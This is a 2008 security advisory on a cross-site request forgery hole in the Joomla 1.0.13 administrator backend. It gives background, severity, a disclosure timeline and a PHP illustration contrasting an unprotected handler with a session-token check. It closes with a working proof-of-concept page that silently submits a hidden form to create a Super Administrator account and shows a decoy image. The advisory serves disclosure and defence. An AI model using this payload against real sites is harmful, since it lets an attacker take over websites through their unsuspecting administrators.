Joomla 1.0.13 CSRF
Author: Jose Carlos Nieto.
Date: Jan 08, 2008
Severity: Mild
There exists a Cross Site Request Forgery (CSRF) security hole in Joomla 1.0.13.
Background
==========
*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source
<http://en.wikipedia.org/wiki/Open_source_software> content management system
<http://en.wikipedia.org/wiki/Content_management_system> for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets
<http://en.wikipedia.org/wiki/Intranet>.
Joomla! is licensed under the GPL
<http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork
<http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo
<http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.
Severity
========
Mild. It requires an administrator to be logged in and to be tricked into
visiting a specially crafted webpage.
Summary
=======
Joomla! 1.0.13 has no CSRF protection on its administrator interface: the
backend accepts any POST request that arrives with the administrator's session
cookie, with no per-request token to prove the request came from one of its own
forms. A malicious user can trick a logged-in administrator into viewing a
specially crafted webpage containing an exploit; that page can submit, without
the administrator's knowledge or consent, any request the administrator could
normally make, such as publishing content or even adding a new administrator.
Solution
========
This problem has no solution at this time.
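The hole is the absence of a per-request secret on state-changing administrator
actions. As an added illustration (this is not Joomla's own code and not a vendor
patch), the following PHP shows a minimal handler in the shape of the com_users
"save" task, first as it behaves without protection and then with a synchronizer
token tied to the session. The function names, the session flag
admin_logged_in, and the sample field values are this example's own assumptions,
and it needs PHP 7 or later for random_bytes().

```php
<?php
// Added illustration, not Joomla code: a minimal "save user" handler in the
// shape of administrator/index2.php?option=com_users&task=save, first as it
// behaves without CSRF protection, then with a synchronizer token check.
// Names (save_user_vulnerable, save_user_protected, csrf_token) and the
// session flag admin_logged_in are this example's own.

session_start();

// Stand-in for the database write; returns what would have been created.
function create_user(array $post): array {
    return [
        'username' => (string) $post['username'],
        'email'    => (string) $post['email'],
        'gid'      => (int) $post['gid'],   // 25 = Super Administrator in Joomla 1.0.x
        'block'    => (int) $post['block'],
    ];
}

// Vulnerable: any POST carrying the right field names is honoured as long as
// the browser attached the admin's session cookie, which it does for the
// hidden form in the proof of concept.
function save_user_vulnerable(array $post): ?array {
    if (empty($_SESSION['admin_logged_in'])) {
        return null;
    }
    return create_user($post);
}

// Issue a per-session secret and embed it in every legitimate admin form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Protected: the attacker's page cannot read the victim's session token
// (same-origin policy), so a forged form cannot supply a matching value.
function save_user_protected(array $post): ?array {
    if (empty($_SESSION['admin_logged_in'])) {
        return null;
    }
    $sent = isset($post['csrf_token']) ? (string) $post['csrf_token'] : '';
    if (!hash_equals(csrf_token(), $sent)) {
        return null;   // reject: token missing or wrong
    }
    return create_user($post);
}

// Demonstration with the same field set the proof of concept submits
// (constructed sample values; the e-mail address is a placeholder).
$_SESSION['admin_logged_in'] = true;
$forged = [
    'name' => 'custom_username', 'username' => 'custom_username',
    'email' => 'joe_cool@example.invalid', 'password' => 'custom_password',
    'password2' => 'custom_password', 'gid' => 25, 'block' => 0,
    'option' => 'com_users', 'task' => 'save', 'sendEmail' => 1,
];
// Forged request: the unprotected handler creates the account.
var_dump(save_user_vulnerable($forged) !== null);
// Forged request: the protected handler rejects it (no token present).
var_dump(save_user_protected($forged) !== null);
// Legitimate request from the admin's own form, which carries the token.
$legitimate = $forged + ['csrf_token' => csrf_token()];
var_dump(save_user_protected($legitimate) !== null);

// The legitimate admin form embeds the token as a hidden field:
echo '<input type="hidden" name="csrf_token" value="'
   . htmlspecialchars(csrf_token(), ENT_QUOTES) . '">' . "\n";
```

The check must be applied to every state-changing task in the backend, not just
user creation; a token the attacker cannot obtain, compared with hash_equals() to
avoid timing leaks, is what the proof of concept below lacks a way to forge.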
Disclosure timeline
===================
Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.
Proof of Concept
================
If a logged-in administrator visits this page, a new administrator account will
be added to the victim's Joomla-powered website.
---- exploit code ----
<script type="text/javascript">
// Builds a hidden POST to the Joomla administrator backend and submits it
// as soon as the page loads; the victim's browser attaches the admin
// session cookie automatically, which is all the backend checks.
window.onload = function() {
    var url = "http://joomlasite.com/joomla/administrator/index2.php";
    var gid = 25;                  // group id 25 = Super Administrator in Joomla 1.0.x
    var user = 'custom_username';
    var pass = 'custom_password';
    var email = 'joe_cool@xxxxxxxxxxx';
    // The same fields the com_users "save" form sends from the admin interface.
    var param = {
        name: user,
        username: user,
        email: email,
        password: pass,
        password2: pass,
        gid: gid,
        block: 0,
        option: 'com_users',
        task: 'save',
        sendEmail: 1
    };
    var form = document.createElement('form');
    form.action = url;
    form.method = 'post';
    form.target = 'hidden';        // submit into the invisible iframe below
    form.style.display = 'none';
    for (var i in param) {
        var input;
        try {
            // IE: a form field's name must be set at creation time
            input = document.createElement('<input name="'+i+'">');
        } catch(e) {
            // other browsers
            input = document.createElement('input');
            input.name = i;
        }
        input.setAttribute('value', param[i]);
        form.appendChild(input);
    }
    document.body.appendChild(form);
    form.submit();
}
</script>
<!-- receives the response so the victim never sees the backend page -->
<iframe name="hidden" style="display: none"></iframe>
<!-- decoy content so the page looks harmless to the victim -->
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">
---- exploit code ----